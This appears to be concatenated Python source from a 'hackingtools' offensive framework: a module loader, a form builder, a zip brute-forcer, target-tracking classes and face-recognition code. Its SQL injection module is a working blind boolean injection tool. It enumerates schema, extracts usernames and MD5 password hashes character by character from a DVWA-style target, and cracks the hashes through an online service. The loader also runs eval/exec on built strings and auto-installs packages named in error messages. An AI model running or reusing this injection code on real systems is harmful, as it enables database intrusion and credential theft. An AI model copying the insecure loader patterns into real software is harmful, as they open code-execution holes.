                    checkbox_selected = temp_m_form[m]['selected']
                
                loading_text = ''
                if 'loading_text' in temp_m_form[m]:
                    loading_text = temp_m_form[m]['loading_text']
                
                required = ''
                if 'required' in temp_m_form[m] and temp_m_form[m] == True:
                    required = 'required'
                
                options_from_function = []
                if 'options_from_function' in temp_m_form[m]:
                    options_from_function = temp_m_form[m]['options_from_function']
                    for optModuleName in options_from_function:
                        if optModuleName in getModulesNames():
                            functionCall = 'getModule(\'{mod}\').{func}()'.format(mod=optModuleName, func=temp_m_form[m]['options_from_function'][optModuleName])
                            options_from_function = eval(functionCall)
                
                if input_type == 'file':
                    html += "<label class=\"btn btn-default\">{input_label_desc}<span class=\"name-file\"></span><input type=\"file\" name=\"{id}\" class=\"{className}\" hidden {required} /></label>".format(input_label_desc=input_label_desc, className=input_class, id=input_id, required=required)
                
                elif input_type == 'checkbox':
                    checkbox_disabled = ''
                    color_on = 'primary'
                    color_off = 'warning'
                    
                    if '__pool_it_' in input_id and not WANT_TO_BE_IN_POOL:
                        checkbox_disabled = 'disabled'
                        color_on = 'default'
                        color_off = 'default'
                    
                    if checkbox_selected:
                        html += "<div class=\"checkbox\"><input type=\"checkbox\" class=\"checkbox\" data-toggle=\"toggle\" data-on=\"On\" data-off=\"Off\" data-onstyle=\"{color_on}\" data-offstyle=\"{color_off}\" id=\"{id}\" name=\"{id}\" {required} checked {disabled}><label style=\"padding: 0 10px;\" for=\"{id}\">{input_label_desc}</label></div><br />".format(color_on=color_on, color_off=color_off, id=input_id, input_label_desc=input_label_desc, required=required, disabled=checkbox_disabled)
                    else:
                        html += "<div class=\"checkbox\"><input type=\"checkbox\" class=\"checkbox\" data-toggle=\"toggle\" data-on=\"On\" data-off=\"Off\" data-onstyle=\"{color_on}\" data-offstyle=\"{color_off}\" id=\"{id}\" name=\"{id}\" {required} {disabled}><label style=\"padding: 0 10px;\" for=\"{id}\">{input_label_desc}</label></div><br />".format(color_on=color_on, color_off=color_off, id=input_id, input_label_desc=input_label_desc, required=required, disabled=checkbox_disabled)
                
                elif input_type == 'select':

                    html += "<span class=\"name-select\"></span><select id=\"editable-select-{id}\" name=\"dropdown_{id}\"placeholder=\"{placeholder}\" class=\"{className}\" {required}>".format(placeholder=input_placeholder, className=input_class, id=input_id, required=required)
                    html += "<option value='{input_value}' selected></option>".format(input_value=input_value)

                    for func in options_from_function:
                        html += "<option value='{cat}'>{cat}</option>".format(cat=func)
                    
                    html += "</select><script>$('#editable-select-{id}').editableSelect();</script>".format(id=input_id)

                elif input_type == 'button':

                    footer += "<button type=\"button\" class=\"{className}\" data-dismiss=\"modal\">{input_value}</button>".format(className=input_class, input_value=input_value)

                elif input_type == 'submit':

                    submit_id = input_id
                    footer += "<input type=\"submit\" class=\"{className}\" value=\"{input_value}\" id=\"{id}\" />".format(className=input_class, input_value=input_value, id=input_id)
                    
                    if loading_text:
                        footer += "<script>$('#"
                        footer += input_id
                        footer += "').on('click', function(e){$('#"
                        footer += input_id
                        footer += "').attr('value', '{loading_text}'); e.preventDevault();".format(loading_text=loading_text)
                        footer += "});</script>"

                elif input_type == 'textarea':

                    if input_label_desc:
                        html += "<div class=\"form-group row\"><label for=\"{id}\" class=\"col-4 col-form-label\">{input_label_desc}</label><div class=\"col-4\"><textarea class=\"{className}\" name=\"{id}\" id=\"{id}\" rows=\"5\" placeholder=\"{placeholder}\"></textarea></div></div>".format(className=input_class, id=input_id, placeholder=input_placeholder, input_label_desc=input_label_desc)
                    else:
                        html += "<textarea class=\"{className}\" name=\"{id}\" id=\"{id}\" rows=\"5\" placeholder=\"{placeholder}\"></textarea>".format(className=input_class, id=input_id, placeholder=input_placeholder)
                
                else:
                    html += "<div class=\"form-group row\"><label for=\"{id}\" class=\"col-4 col-form-label\">{input_label_desc}</label><div class=\"col-4\"><input class=\"{className}\" type=\"{input_type}\" value=\"{input_value}\" placeholder=\"{placeholder}\" name=\"{id}\" {required}/></div></div>".format(id=input_id, placeholder=input_placeholder, input_label_desc=input_label_desc, className=input_class, input_type=input_type, input_value=input_value, required=required)
    
    for m in m_form:
        if '__async__' == m and m_form[m]:
            html += "<input type='text' value='true' id='is_async' hidden />"

    footer += '</div>'
    html += footer
    html += '</div>'

    for m in m_form:
        if '__async__' == m and m_form[m]:
            async_script = "<script> $(function() { "
            if config_extrasubkey:
                async_script += "$('#submit_test_{submit_id}').click(function(e)".format(submit_id=config_extrasubkey)
            else:
                async_script += "$('#submit_test_{submit_id}').click(function(e)".format(submit_id=mod)
            async_script += "{ e.preventDefault();"
            async_script += "$.ajax({ headers: { 'X-CSRFToken': '{"
            async_script += "{csrf_token"
            async_script += "}"
            async_script += "}' }, "
            if config_extrasubkey:
                async_script += "url : '/modules/{mod}/{functionName}/', type : 'POST', async: true, ".format(mod=mod, functionName=config_extrasubkey)
            else:
                async_script += "url : '/modules/{mod}/test_{mod}/', type : 'POST', async: true, ".format(mod=mod)
            async_script += "success : function(res) {"
            async_script += "if('data' in res){"
            async_script += "alert(res.data)"
            async_script += "} else { "
            async_script += "alert('Error')"
            async_script += "}"
            async_script += "}, error : function(xhr,errmsg,err) { console.log(xhr.status + ': ' + xhr.responseText); } }); }); }); </script>"
            html += async_script
    return html

def __getModulesDjangoForms__():
    forms = {}
    for mod in getModulesNames():
        form = __createHtmlModalForm__(mod)
        if form:
            forms[mod] = form
    return forms

def __getModulesDjangoFormsModal__():
    forms = {}
    for mod in getModulesNames():
        mod_data = {}
        functions = __getModuleFunctionNamesFromConfig__(mod)
        if functions:
            for functs in functions:
                form = __createHtmlModalForm__(mod, 'django_form_module_function', functs)
                if form:
                    mod_data[functs] = form
        if mod_data:
            forms[mod] = mod_data
    return forms

def __getModuleFunctionNamesFromConfig__(mod):
    functions = Config.getConfig(parentKey='modules', key=mod, subkey='django_form_module_function')
    if functions:
        return [func_name for func_name in functions]
    else:
        return

def getModulesConfig():
    return [{m:Config.getConfig(parentKey='modules', key=m.split('.')[-1])} for m in modules_loaded]

# Core method
def __importModules__():
    """
    Método que busca dentro de las carpetas junto a este fichero (ignorando las directorios marcados anteriormente)
    y como subcarpetas tiene que haber el nombre del tipo de herramienta que es y debajo de esas carpetas
    tienen que estar los directorios individualmente por herramientas que se incorpore a la librería
    """
    modules = __getModules__()
    Logger.printMessage(message='{meth}'.format(meth='__importModules__'), description='Loading modules...', debug_module=True)
    with progressbar.ProgressBar(max_value=progressbar.UnknownLength) as bar:
        for modu in modules:
            for submod in modules[modu]:
                for files in modules[modu][submod]:
                    module_name = modules[modu][submod][files][0].split(".")[0]
                    #Logger.printMessage(message='{category}'.format(category=submod), description=module_name, debug_module=True) 
                    module_import_string = 'from .{modules}.{category}.{tool} import {toolFileName}'.format(package=package, modules=modu, category=submod, tool=files, toolFileName=module_name)
                    module_import_string_no_from = '{modules}.{category}.{tool}.{toolFileName}'.format(package=package, modules=modu, category=submod, tool=files, toolFileName=module_name)
                    try:
                        exec(module_import_string)
                        #globals()[module_name] = importlib.import_module(module_import_string)
                        module_className = __classNameFromModule__(eval(module_name))
                        module_functions = __methodsFromModule__(eval(module_name))
                        #Logger.printMessage(message='{mod} loaded'.format(mod=module_name), debug_module=True)
                        bar.update(1)
                        if len(module_functions) > 0:
                            modules_loaded[module_import_string_no_from] = {}
                            for mod_func in module_functions:
                                function = '{module}.{callClass}().{function}'.format(module=module_name, callClass=default_class_name_for_all, function=mod_func)

                                try:
                                    params_func = inspect.getfullargspec(eval(function))[0]
                                except:
                                    pass

                                clean_params = []
                                if params_func:
                                    for param_func in params_func:
                                        if param_func not in function_param_exclude:
                                            clean_params.append(param_func)

                                modules_loaded[module_import_string_no_from][mod_func] = {}

                                if clean_params and len(clean_params) > 0:
                                    modules_loaded[module_import_string_no_from][mod_func]['params'] = clean_params
                                else:
                                    modules_loaded[module_import_string_no_from][mod_func]['params'] = False
                        else:
                            modules_loaded[module_import_string_no_from] = 'Sin funciones...'   
                    except Exception as e:
                        if 'No module named' in str(e):
                            try:
                                Logger.printMessage(message='__importModules__', description='Trying to install module {m}'.format(m=str(e).split("'")[1]), color=Fore.YELLOW)
                                pipmain(['install', '--user', str(e).split("'")[1]])
                            except:
                                pass

                        Logger.printMessage(message='__importModules__', description='{moduleName} [ERROR] {error}'.format(moduleName=module_import_string, error=str(e)), is_error=True)

def getModules():
    data = []
    for mods in modules_loaded:
        data.append('modules.{name}.{classInit}()'.format(name=mods.split('.')[-1], classInit=default_class_name_for_all))
    return data

def createModule(moduleName, category):
    """
    Iniciamos con el comando anterior la instancia del modulo
    """
    Logger.printMessage('Creating {moduleName} on {category}'.format(moduleName=moduleName, category=category), debug_module=True)
    moduleName = moduleName.replace(" ", "_").lower()
    category = category.lower()
    categories = getCategories()
    if category not in categories:
        createCategory(category)
    dir_actual = os.path.dirname(__file__)
    if not os.path.isdir('{dir}/modules/{category}/{moduleName}'.format(dir=dir_actual, category=category, moduleName=moduleName)):
        os.makedirs('{dir}/modules/{category}/{moduleName}'.format(dir=dir_actual, category=category, moduleName=moduleName))
    if not os.path.exists('{dir}/modules/{category}/__init__.py'.format(dir=dir_actual, category=category)):
        f = open('{dir}/modules/{category}/__init__.py'.format(dir=dir_actual, category=category), "w")
        f.write('')
    if not os.path.exists('{dir}/modules/{category}/{moduleName}/ht_{moduleName}.py'.format(dir=dir_actual, category=category, moduleName=moduleName)):
        f = open('{dir}/modules/{category}/{moduleName}/ht_{moduleName}.py'.format(dir=dir_actual, category=category, moduleName=moduleName), "w")
        f.write(default_template_modules_ht.format(moduleName=moduleName))
    if not os.path.exists('{dir}/modules/{category}/{moduleName}/__init__.py'.format(dir=dir_actual, category=category, moduleName=moduleName)):
        f = open('{dir}/modules/{category}/{moduleName}/__init__.py'.format(dir=dir_actual, category=category, moduleName=moduleName), "w")
        f.write('')
    # temp_path, hackingtools_dir = os.path.split(dir_actual)
    # temp_path, library_dir = os.path.split(temp_path)
    # urls_file = os.path.join(temp_path, 'urls.py')
    # insert_url_django(urls_file, moduleName) # TODO edit urls for auto URLs when creating module
    # print("{msg}".format(msg=urls_file))
    # Reload variables on client side
    global hackingtools
    #reload(hackingtools)
    Config.__createModuleTemplateConfig__(moduleName)
    trying_something = __importModules__()
    return

def insert_url_django(url, name):
    print(url)
    print(name)

def createCategory(categoryName):
    categoryName = categoryName.lower()
    categories = getCategories()
    dir_actual = os.path.dirname(__file__)
    if categoryName not in categories:
        if not os.path.isdir('{dir}/modules/{category}/'.format(dir=dir_actual, category=categoryName)):
            os.makedirs('{dir}/modules/{category}'.format(dir=dir_actual, category=categoryName))

def getCategories():
    data = []
    for mods in modules_loaded:
        if mods not in data:
            data.append(mods.split('.')[3])
    return data

__importModules__()



from colorama import init, Fore
import requests
import urllib
import json
import binascii
import os

import hackingtools as ht
from hackingtools.core import Config, Logger

config = Config.getConfig(parentKey='modules', key='ht_sqlinjection')
config_dict = Config.getConfig(parentKey='core', key='Utils', subkey='dictionaries')
config_decrypt = Config.getConfig(parentKey='core', key='Utils', subkey='resources_cryptography_rest_api')

output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

url = ''
cookie_session = ''
param_focus = ''
security = ''

url_md5_decrypt = config_decrypt['md5_decrypt']

class StartModule():

    def __init__(self):
        pass
    
    def help(self):
        Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_sqlinjection'))
        
    def setParams(self, url, param_focus, cookie='', proxies='', submit_name='', security=''):
        self.url = url
        self.cookie_session = cookie
        self.param_focus = param_focus
        self.proxies = proxies
        self.submit_name = submit_name
        self.security = security

    def color(self, texto, color):
        return '{iniColor}{texto}{finColor}'.format(iniColor=eval('Fore.{color}'.format(color=color)), texto=texto, finColor=Fore.WHITE)

    # Esta funcion hay que sacarla a una llamada a un modulo de criptografria
    def md5_decrypt(self, clave):
        clave_descifrada = ''
        r = requests.get(url = self.url_md5_decrypt, params = {'value': clave})
        if r.status_code == 200:
            datos = r.content.decode("utf-8")
            for d in datos:
                if not clave_descifrada and d in 'result':
                    actual = r.content.decode("utf-8")
                    json_acceptable_string = actual.replace("'", "\"")
                    d = json.loads(json_acceptable_string)
                    try:
                        if d and d['result']:
                            clave_descifrada = d['result']
                    except Exception as e:
                        pass
        return clave_descifrada

    def ejecutarSQL(self, sqli):
        try:
            if self.proxies:
                if self.submit_name:
                    result = requests.post(
                        url=self.url,
                        headers={'Content-Type':'application/x-www-form-urlencoded'},
                        cookies={'PHPSESSID' : self.cookie_session, 'security' : self.security},
                        proxies={'http' : self.proxies},
                        data={self.param_focus: sqli, self.submit_name: 'Submit'}
                    )
                else:
                    result = requests.post(
                        url=self.url,
                        headers={'Content-Type':'application/x-www-form-urlencoded'},
                        cookies={'PHPSESSID' : self.cookie_session, 'security' : self.security},
                        proxies={'http' : self.proxies},
                        data={self.param_focus: sqli}
                    )
            else:
                if self.submit_name:
                    result = requests.post(
                        url=self.url,
                        headers={'Content-Type':'application/x-www-form-urlencoded'},
                        cookies={'PHPSESSID':self.cookie_session, 'security':self.security},
                        #proxies={'http':'http://127.0.0.1:8080/'},
                        data={self.param_focus: sqli, self.submit_name: 'Submit'}
                    )
                else:
                    result = requests.post(
                        url=self.url,
                        headers={'Content-Type':'application/x-www-form-urlencoded'},
                        cookies={'PHPSESSID':self.cookie_session, 'security':self.security},
                        #proxies={'http':'http://127.0.0.1:8080/'},
                        data={self.param_focus: sqli}
                    )
            if result.status_code == 200:
                if 'ID exists' in result.text:
                    return True
                elif 'ID is MISSING' in result.text:
                    return False
                else:
                    print('[{asterisco}] - {mensaje} {sql}'.format(asterisco=self.color('*', config['color_error']), mensaje=self.color('Algo ha ido mal con tu sql', config['color_error']),  sql=sqli))
                    return False
            else:
                print('[{asterisco}] - {mensaje} {url} - {sqli}'.format(asterisco=self.color('*', config['color_error']), mensaje=self.color('URL mal formada...', config['color_error']), url=result.url, sqli=sqli))
                return False
        except Exception as e:
            print('[{asterisco}] - {mensaje} {error}'.format(asterisco=self.color('*', config['color_error']), mensaje=self.color('Excepcion... Que ha pasado?', config['color_error']), error=e))
            return False        

    def cantidadTuplasEnTapla(self, tabla, campo):
        result = 0
        for i in range(0, 100000):
            sentencia = "0 or {i} = (select count({campo}) from {tabla})".format(i=i, campo=campo, tabla=tabla)
            existe = self.ejecutarSQL(sentencia)
            if existe:
                result = i+1
                break
        return result

    def longitudCampoIDtablaCampo(self, id, tabla, campo, campoConocido):
        for i in range(1, 100):
            sentencia = "0 or exists(select {campo} from {tabla} where {campoConocido}={id} and length({campo}) = {i})".format(i=i+1, campo=campo, tabla=tabla, campoConocido=campoConocido, id=id)
            #print(sentencia)
            existe = self.ejecutarSQL(sentencia)
            if existe:
                return i+2
        return -1

    def cogerNombreDeTablaPorID(self, user, tabla, id, campoConocido):
        nombre = ''
        cantidad=self.longitudCampoIDtablaCampo(id, tabla, user, campoConocido)
        abecedario = config['lalpha']
        if 'password' in user:
            abecedario = config_dict['hex-lower']
        if cantidad > 0:
            print('[{asterisco}] - {titulo_tabla}: {tabla} {titulo_campo}: {campo} {titulo_longitud}: {cantidad} {campoConocido}: {id} {titulo_abecedario}: {abecedario}'.format(asterisco=self.color('*', config['color_verbose']), titulo_tabla=self.color('Tabla', config['color_verbose']), tabla=tabla, titulo_campo=self.color('Campo', config['color_verbose']), campo=user, titulo_longitud=self.color('Longitud', config['color_verbose']), cantidad=cantidad-1, campoConocido=self.color(campoConocido, config['color_verbose']), id=id, titulo_abecedario=self.color('Abecedario', config['color_verbose']), abecedario=abecedario))
            for j in range(1, cantidad): # Longitud de dicho nombre de user
                for i in range(0, len(abecedario)):
                    existe = self.ejecutarSQL("0 or exists(select {user} from {tabla} where user_id={id} and ASCII(substring({user}, {j}, 1))={i})".format(user=user, tabla=tabla, id=id, j=j, i=ord(abecedario[i])))
                    if existe:
                        nombre = '{nombre}{letra}'.format(nombre=nombre, letra=abecedario[i])
                        break
        else:
            print('[{asterisco}] - La longitud del campo {campo} es {longitud}'.format(asterisco=self.color('*', config['color_error']), campo=campoConocido, longitud=cantidad))
        return nombre

    def sacarValorPorTablaColumnaID(self, tabla, columna, nombre_campo_id):
        print('[{asterisco}] - Sacando datos de la tabla {tabla} de la columna {columna}'.format(asterisco=self.color('*', config['color_info']), tabla=tabla, columna=columna))
        contador_null = 0
        nombres = []
        cantidad_registros_en_tabla = self.cantidadTuplasEnTapla(tabla, columna)        
        if cantidad_registros_en_tabla > 0:
            print('[{asterisco}] - {mensaje} {num} {mensaje2} {tabla}'.format(asterisco=self.color('*', config['color_ok']), mensaje=self.color('Se han encontrado', config['color_ok']), num=cantidad_registros_en_tabla, mensaje2=self.color('registros en la tabla', config['color_ok']), tabla=tabla))
            for k in range(1, cantidad_registros_en_tabla): # Cantidad de tuplas en users
                datos = self.cogerNombreDeTablaPorID(columna, tabla, k, nombre_campo_id)
                if datos:
                    nombres.append(datos)
                else:
                    if contador_null == 1:
                        break
                    contador_null += 1
        else:
            print('[{asterisco}] - {mensaje}\tTabla: {tabla} - Columna: {columna} - Campo conocido: {nombre_campo_id}'.format(asterisco=self.color('*', config['color_error']), mensaje=self.color('No hay registros', config['color_error']), tabla=tabla, columna=columna, nombre_campo_id=nombre_campo_id))
        return nombres

    def compareTextExistWhereSubstringACII(self, tabla_name, table): # Devuelve : AND ASCII(substring) ... AND ... AND ASCII(substring)
        sentencia = ''
        for i in range(0, len(tabla_name)):
            sentencia = '{sentencia}AND ASCII(substring({tabla}, {i}, 1)) = {ascii} '.format(sentencia=sentencia, tabla=table.split(".")[1], i=i+1, ascii=ord(tabla_name[i]))
        return sentencia

    def transformAsciiToHex(self, ascii_text):
        datos = '0x'
        for letra in ascii_text:
            datos = '{datos}{nuevo}'.format(datos=datos, nuevo=hex(ord(letra))[2:])
        return datos

    def cogerColumnasTabla(self, tabla, tabla_name): # information_schema.columns, table_name
        nombres = []
        hexadecimal = self.transformAsciiToHex(tabla_name)
        sentencia_tabla_name = self.compareTextExistWhereSubstringACII(tabla_name, tabla)
        for k in range(1, 10):
            nombre = ''
            for i in range(1, 20):
                for j in range(0, len(config['lalpha'])):
                    if nombre:
                        nom = self.transformAsciiToHex(nombre)
                    else:
                        nom = self.transformAsciiToHex(config['lalpha'][j])
                    sentencia = "0 or substring((select group_concat(column_name) from {tabla} where table_schema=DATABASE() and table_name={hexadecimal}), {posicion}, 1)={comparacion}".format(comparacion=nom, tabla=tabla, posicion=i, hexadecimal=hexadecimal)
                    existe =  self.ejecutarSQL(sentencia)
                    if existe:
                        nombre = '{nombre}{letra}'.format(nombre=nombre, letra=config['lalpha'][j])
                        break
            if not nombre:
                break
            nombres.append(nombre)
        return nombres

    def cogerTablas(self):
        # 1' union all select table_schema,table_name FROM information_schema.tables WHERE table_schema != "mysql" AND table_schema != "information_schema" -- 
        pass

    def mostrarUserPass(self):
        nombres = self.sacarValorPorTablaColumnaID(tabla='users', columna='user', nombre_campo_id='user_id')
        password = self.sacarValorPorTablaColumnaID(tabla='users', columna='password', nombre_campo_id='user_id')
        contador = 0
        for passw in password:
            pass_dec = self.md5_decrypt(passw)
            print('[{asterisco}] - {titulo_user}: {user}\t- {titulo_passw}: {passw}\t- {titulo_password_limpia}: {pass_limpia}'.format(asterisco=self.color('*', config['color_ok']), titulo_user=self.color('User', config['color_ok']), user=self.color(nombres[contador], config['color_ok']), titulo_passw=self.color('Password', config['color_ok']), passw=self.color(passw, config['color_ok']), titulo_password_limpia=self.color('Password Limpia', config['color_ok']), pass_limpia=self.color(pass_dec, config['color_ok'])))
            contador += 1


from hackingtools.core import Logger, Utils, Config
import hackingtools as ht
import os

import time
import progressbar
import numpy

config = Config.getConfig(parentKey='modules', key='ht_bruteforce')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

	def __init__(self):
		Utils.emptyDirectory(output_dir)
		pass

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_bruteforce'))

	def crackZip(self, zipPathName, unzipper=None, alphabet='lalpha', password_length=4, log=False):
		max_length_posibilities = int(config['max_for_chunk'])
		if not unzipper:
			unzipper = ht.getModule('ht_unzip')
		if log:
			Logger.setDebugCore(True)
		texts = Utils.getDict(length=int(password_length), alphabet=alphabet)
		if len(texts) > max_length_posibilities:
			texts_list = numpy.array_split(texts, max_length_posibilities)
		else:
			texts_list = [texts]
		for index_t_list, t_list in enumerate(texts_list):
			if len(texts) > max_length_posibilities:
				Logger.printMessage(message='crackZip', description='Chunk {n} - {word}'.format(n=index_t_list, word=t_list[1]))
			for text in t_list:
				if os.path.isfile(zipPathName):
					password = unzipper.extractFile(zipPathName, text, posible_combinations=len(texts))
				else:
					Logger.printMessage(message='crackZip', description='File doesnt exists {a}'.format(a=zipPathName), is_error=True)
					break
				if password:
					Logger.printMessage(message='crackZip', description='{msg_password_is} {a}'.format(msg_password_is=config['msg_password_is'], a=password))
					if log:
						Logger.setDebugCore(False)
					return password
		Logger.setDebugCore(False)
		return None


from . import Logger
import json

class Host():

    def __init__(self, target_id, ip=[], ports=[], hostnames=[], city='', country_name='', org='', isp='', last_update='', asn='', os='', data=''):
        self.target_id = target_id
        self.ip = ip
        self.ports = ports
        self.hostnames = hostnames
        self.city = city
        self.country_name = country_name
        self.org = org
        self.isp = isp
        self.last_update = last_update
        self.asn = asn
        self.os = os
        self.data = data

    def __str__(self):
        parameters = {}
        if self.target_id:
            parameters["target_id"] = self.target_id
        if self.ip:
            parameters["ip"] = self.ip
        if self.ports:
            parameters["ports"] = self.ports
        if self.hostnames:
            parameters["hostnames"] = self.hostnames
        if self.city:
            parameters["city"] = self.city
        if self.country_name:
            parameters["country_name"] = self.country_name
        if self.org:
            parameters["org"] = self.org
        if self.isp:
            parameters["isp"] = self.isp
        if self.last_update:
            parameters["last_update"] = self.last_update
        if self.asn:
            parameters["asn"] = self.asn
        if self.os:
            parameters["os"] = self.os
        if self.data:
            parameters["data"] = self.data
        Logger.printMessage(message='{data}'.format(data=json.dumps(parameters, indent=4, sort_keys=True), debug_core=True))
        return parameters
    
    def addScanResult(self, result):
        try:
            print(result)
            for r in result:
                try:
                    if "ip_str" == r:
                        if not result[r] in self.ip:
                            self.ip.append(result[r])
                    if "ports" == r:
                        for p, val in result[r]:
                            if not p in self.ports:
                                self.ports.append({p, val})
                    if "hostnames" == r:
                        self.hostnames += list(result[r])
                    if "city" == r:
                        self.city = result[r]
                    if "country_name" == r:
                        self.country_name = result[r]
                    if "org" == r:
                        self.org = result[r]
                    if "isp" == r:
                        self.isp = result[r]
                    if "last_update" == r:
                        self.last_update = result[r]
                    if "asn" == r:
                        self.asn = result[r]
                    if "os" == r:
                        self.os = result[r]
                    if "data" == r:
                        self.data = result[r]
                except:
                    pass
        except:
            pass
        
class Target():

    def __init__(self, name, id, mail=[], passwords=[], hosts=[], pictures=[], social_networks=[]):
        self.name = name
        self.id = id
        self.mail = mail
        self.passwords = passwords
        self.hosts = hosts
        self.pictures = pictures
        self.social_networks = social_networks

    def renameTarget(self, name):
        try:
            self.name = name
            return True
        except:
            return False

    def addHost(self, host):
        try:
            if not host in self.hosts:
                self.hosts.append(host)
                return True
            return False
        except:
            return False

    def getHostsWithKey(self, key):
        try:
            response = []
            for host in self.hosts:
                if key in host.name:
                    response.append(host)
            return response
        except:
            return []

    def getHostByName(self, name):
        try:
            response = []
            for host in self.hosts:
                if name in host.name:
                    response.append(host)
            return response
        except:
            return []

    def getHostByCpe(self, cpe):
        try:
            response = []
            for host in self.hosts:
                if name in host.name:
                    response.append(host)
            return response
        except:
            return []

    def getHostsByIp(self, ip):
        try:
            response = []
            for host in self.hosts:
                if ip in host.ip:
                    response.append(host)
            return response
        except:
            return None

    def existsHostWithIp(self, ip):
        try:
            response = []
            for host in self.hosts:
                if ip in host.ip:
                    return True
            return False
        except:
            return None
    
    def removeHost(self, host):
        try:
            if host in self.hosts:
                self.hosts.remove(host)
                return True
            return False
        except:
            return False



"""

NOTE: This example requires scikit-learn to be installed! You can install it with pip:

$ pip3 install scikit-learn

Also install zlib

http://gnuwin32.sourceforge.net/packages/zlib.htm

"""
from hackingtools.core import Logger, Utils, Config
import hackingtools as ht
import os
import math
from sklearn import neighbors
import pickle
from PIL import Image, ImageDraw
import face_recognition
from face_recognition.face_recognition_cli import image_files_in_folder
import cv2

config = Config.getConfig(parentKey='modules', key='ht_objectdetection')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))
output_dir_models = os.path.abspath(os.path.join(os.path.dirname(__file__), 'tests_models'))

ALLOWED_EXTENSIONS = config['allowed_extensions']

class StartModule():

	def __init__(self):
		pass

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_objectdetection'))

	def getTestsModelsDir(self):
		models = []
		for fileName in os.listdir(output_dir_models):
			if fileName.endswith(".{clf}".format(clf=config['models_tests_extension'])):
				models.append(fileName)
		return models

	def train(self, train_dir, model_save_path=None, n_neighbors=None, knn_algo='ball_tree', verbose=False):
		"""
		Trains a k-nearest neighbors classifier for face recognition.

		:param train_dir: directory that contains a sub-directory for each known person, with its name.

		(View in source code to see train_dir example tree structure)

		Structure:
			<train_dir>/
			├── <person1>/
			│   ├── <somename1>.jpeg
			│   ├── <somename2>.jpeg
			│   ├── ...
			├── <person2>/
			│   ├── <somename1>.jpeg
			│   └── <somename2>.jpeg
			└── ...

		:param model_save_path: (optional) path to save model on disk
		:param n_neighbors: (optional) number of neighbors to weigh in classification. Chosen automatically if not specified
		:param knn_algo: (optional) underlying data structure to support knn.default is ball_tree
		:param verbose: verbosity of training
		:return: returns knn classifier that was trained on the given data.
		"""
		Logger.printMessage(message="train", description="{msg}: {d}".format(msg=config['training_log_message'], d=train_dir), debug_module=True)
		X = []
		y = []

		# Loop through each person in the training set
		for class_dir in os.listdir(train_dir):
			if not os.path.isdir(os.path.join(train_dir, class_dir)):
				continue

			# Loop through each training image for the current person
			for img_path in image_files_in_folder(os.path.join(train_dir, class_dir)):
				image = face_recognition.load_image_file(img_path)
				face_bounding_boxes = face_recognition.face_locations(image)

				if len(face_bounding_boxes) != 1:
					# If there are no people (or too many people) in a training image, skip the image.
					if verbose:
						Logger.printMessage(
							message="train", 
							description="{img} {bad_image}: {msg}".format(
								img=img_path, 
								bad_image=config['training_log_bad_image'], 
								msg=config['training_log_no_recognition'] if len(face_bounding_boxes) < 1 else config['training_log_much_recognition']), 
								debug_module=True)
				else:
					# Add face encoding for current image to the training set
					X.append(face_recognition.face_encodings(image, known_face_locations=face_bounding_boxes)[0])
					y.append(class_dir)

		# Determine how many neighbors to use for weighting in the KNN classifier
		if n_neighbors is None:
			n_neighbors = int(round(math.sqrt(len(X))))
			if verbose:
				Logger.printMessage(
					message="train", 
					description="{neig}: {d}".format(neig=config['training_log_n_neighbors'], d=n_neighbors), 
					debug_module=True)
		
		# Create and train the KNN classifier
		knn_clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors, algorithm=knn_algo, weights='distance')
		knn_clf.fit(X, y)

		# Save the trained KNN classifier
		if model_save_path is not None:
			with open(model_save_path, 'wb') as f:
				pickle.dump(knn_clf, f)

		return knn_clf

	def predict(self, X_img_path, knn_clf=None, model_path=None, distance_threshold=0.6):
		"""
		Recognizes faces in given image using a trained KNN classifier

		:param X_img_path: path to image to be recognized
		:param knn_clf: (optional) a knn classifier object. if not specified, model_save_path must be specified.
		:param model_path: (optional) path to a pickled knn classifier. if not specified, model_save_path must be knn_clf.
		:param distance_threshold: (optional) distance threshold for face classification. the larger it is, the more chance
			of mis-classifying an unknown person as a known one.
		:return: a list of names and face locations for the recognized faces in the image: [(name, bounding box), ...].
			For faces of unrecognized persons, the name 'unknown' will be returned.
		"""
		if not os.path.isfile(X_img_path) or os.path.splitext(X_img_path)[1][1:] not in ALLOWED_EXTENSIONS:
			Logger.printMessage(message="predict", description="{invalid_path}: {im}".format(invalid_path=config['predicting_invalid_path'], im=X_img_path))
			return []
		
		if knn_clf is None and model_path is None:
			Logger.printMessage(message="predict", description=config['predicting_no_knn_or_model_path'])
			return []

		# Load a trained KNN model (if one was passed in)
		if knn_clf is None:
			with open(model_path, 'rb') as f:
				knn_clf = pickle.load(f)

		# Load image file and find face locations
		X_img = face_recognition.load_image_file(X_img_path)
		X_face_locations = face_recognition.face_locations(X_img)

		# If no faces are found in the image, return an empty result.
		if len(X_face_locations) == 0:
			return []

		# Find encodings for faces in the test iamge
		faces_encodings = face_recognition.face_encodings(X_img, known_face_locations=X_face_locations)

		# Use the KNN model to find the best matches for the test face
		closest_distances = knn_clf.kneighbors(faces_encodings, n_neighbors=1)
		are_matches = [closest_distances[0][i][0] <= distance_threshold for i in range(len(X_face_locations))]

		# Predict classes and remove classifications that aren't within the threshold
		return [(pred, loc) if rec else ("unknown", loc) for pred, loc, rec in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches)]

	def saveCroppedImage(self, img_path, coords, model_path, name, counter=1):
		# Crop the image
		try:
			top, right, bottom, left = coords
			image = cv2.imread(img_path)
			crop_img = image[top:bottom, left:right]
			path, n = os.path.split(img_path)
			path2, n2 = os.path.split(model_path)
			cropped_file = os.path.join(output_dir, n2.split('.')[0], name.decode("UTF-8"), 'cropped_{c}_{n}'.format(c=counter, n=n))
			print(cropped_file)
			cv2.imwrite(cropped_file, crop_img)
		except Exception as e:
			Logger.printMessage(message='saveCroppedImage', description=str(e), is_error=True)

	def show_prediction_labels_on_image(self, img_path, predictions, model_path):
		"""
		Shows the face recognition results visually.

		:param img_path: path to image to be recognized
		:param predictions: results of the predict function
		:return:
		"""
		Logger.printMessage(message="show_prediction_labels_on_image", description="Testing: {d}".format(d=img_path), debug_module=True)
		pil_image = Image.open(img_path).convert("RGB")
		draw = ImageDraw.Draw(pil_image)
		counter = 0
